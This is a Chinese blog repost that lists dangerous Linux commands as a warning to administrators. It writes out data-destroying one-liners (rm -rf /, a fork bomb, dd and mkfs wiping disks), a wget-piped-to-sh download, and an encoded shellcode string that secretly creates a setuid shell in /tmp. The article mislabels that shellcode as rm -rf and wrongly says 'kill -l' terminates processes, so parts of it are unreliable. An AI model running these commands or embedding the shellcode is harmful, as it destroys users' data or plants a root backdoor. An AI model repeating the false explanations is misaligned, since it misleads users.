记住保命！将 Linux 下的高危命令一网打尽！

2022-05-24 00:00:00 执行删除命令文件进程

1、rm -rf 命令

该命令可能导致不可恢复的系统崩坏。


> rm -rf /  #强制删除根目录下所有东西。> rm -rf *  #强制删除当前目录的所有文件。> rm -rf .  #强制删除当前文件夹及其子文件夹。

执行 rm -rf 一定要想半天，搞明白自己在干什么。所谓的删库跑路，大多基于这个命令，就算是运维老司机也不要轻易尝试。

-rf 将递归删除文件，误删文件导致数据丢失，产生严重后果。如果多一个空格，或者 /没有补齐，或者文件有特殊符号，导致误删文件的误操作居多。

2、fork 炸弓单


:() { :|:& };:

不太好理解可以转换成：

bomb(){    bomb|bomb&};bomb

一旦执行起来，-bash: fork: Cannot allocate memory，会把系统资源消耗殆尽。它会调用自己两次，一次在前台另一次运行在后台。它会反复的执行下去直到系统崩溃。

3、echo “” > /dev/sda

该操作会将在块设备中的所有数据块替换为命令写入的原始数据，从而导致整个块设备的数据丢失。

4、mv 文件夹 /dev/null


> mv /etc /dev/null

/dev/null 或 null 设备是一个特殊的文件，所有写入它的数据都会被清除，然后返回写操作成功。但是这个命令并不能阻止数据恢复软件——所以，真正的彻底毁灭，需要采用专用的软件或者手法来完成。

5、下载的文件立即执行


> wget http://rumenz.com/rumenz.sh -O- | sh

如果 rumenz.sh 是一个病毒脚本，就完蛋了。下载脚本文件之前要看看里面的内容，有危险的操作就不要执行。

6、mkfs.ext3 /dev/sdb

这个命令会格式化块设备 sdb，在执行这个命令后你的块设备（硬盘驱动器）会被格式化，直接让你的系统达到不可恢复的阶段。

7、重定向输出到文件


>  > rumenz.txt

这个命令常用来清空文件内容或记录命令输出，执行之前请考虑清楚。

8、硬盘清零

dd 命令用于复制&改变硬盘分区。如果，你用错地方了，那么也很危险。

下面列举 dd 命令：


dd if=/dev/hda of=/dev/hdbdd if=/dev/hda of=/dev/sdbdd if=something of=/dev/hdadd if=something of=/dev/sda

下面这个命令会将整个主硬盘清零：


> dd if=/dev/zero of=/dev/had

所以，不管是新手还是老司机，都不要轻易尝试。

9、执行伪装后的命令


char esp[] __attribute__ ((section(“.text”))) /* e.s.prelease */= “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68″“\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99″“\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7″“\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56″“\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31″“\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69″“\x6e\x2f\x73\x68\x00\x2d\x63\x00″“cp -p /bin/sh /tmp/.beyond; chmod 4755/tmp/.beyond;”;

上面的命令就是 rm -rf，这里的代码是隐藏在十六进制里的，可能会擦除你的根分区，所以看不懂的命令千万不能执行，非要看效果，请在虚拟机中执行。

10、Decompression Bomb

你已经收到一个压缩文件，你被要求提取这个看起来很小的文件，可能小到KB。事实上，该小尺寸的压缩文件包含高度压缩数据。

只要文件解压，上百GB数据会被提取，这时候，过大的数据填满硬盘导致宕机，几率就很大了。如何避免？还是那句老话，别手贱，什么文件都去接收，请接收可信任来源文件。

11、Malicious Source Code

也许有人会给你源代码让你编译他。代码可能是正常代码，不过，有一些恶意代码伪装在大型源代码中，如果是这样，你的系统就中枪了。如何避免？仅接受并编译可信赖来源的源代码。

12、Tar Bomb

tar命令用于将多个文件以.tar 格式放入一个文件中（存档文件）。Tape Archive (Tar) bomb 可以由他创建。

当为压缩时，就是这个存档文件生成数以万计的相似名称文件出现在当前目录中而不是新目录。

当收到tar文件，定期创建一个新的保护目录，然后在解压前将接受的tar文件放到这个目录中，你可以避免成为tar bomb的受害者。

13. ^foo^bar

这样利用^符号，通过上翻补全命令的方式，直接编辑之前运行过的命令。虽然你或许因此不用再输入整条长命令，但其实这会很危险。

14、kill\killall

killall 命令，杀死同一进程组内的所有进程，其允许指定要终止的进程的名称，而非 PID

killall 和 pkill 是相似的，不过如果给出的进程名不完整，killall会报错。pkill 或者 pgrep只要给出进程名的一部分就可以终止进程。

homer@ubuntu:~$ killall firefofirefo: no process foundhomer@ubuntu:~$ killall firefoxhomer@ubuntu:~$ killall -9 firefox

杀死进程安全的方法是单纯使用kill命令，不加修饰符，不带标志。

例如：# kill -pid

注释：标准的kill命令，默认采用信号（signal）号是15，通常都能达到目的，终止有问题的进程，并把进程的资源释放给系统。然而，如果进程启动了子进程，只杀死父进程，子进程仍在运行，因此仍消耗资源。为了防止这些所谓的“僵尸进程”，应确保在杀死父进程之前，先杀死其所有的子进程。

kill -l

例如：kill -l PID

-l 选项，告诉kill命令用好像启动进程的用户已注销的方式结束进程。当使用该选项时，kill命令也试图杀死所留下的子进程。但这个命令也不是总能成功—或许仍然需要先手工杀死子进程，然后再杀死父进程。

15、打断fsck

fsck 如果底层硬件以某种方式损坏，肯定弊大于利；CPU坏，RAM坏，硬盘快要死了，磁盘 Controller 坏了……在这些情况下，更多的损坏是不可避免的。

如果有疑问，好使用 dd_rescue 对损坏的磁盘进行镜像。或其他工具，然后看看您是否可以成功修复该图像。这样，您仍然可以使用原始设置。

来源：本文转自公众号 Linux学习

相关文章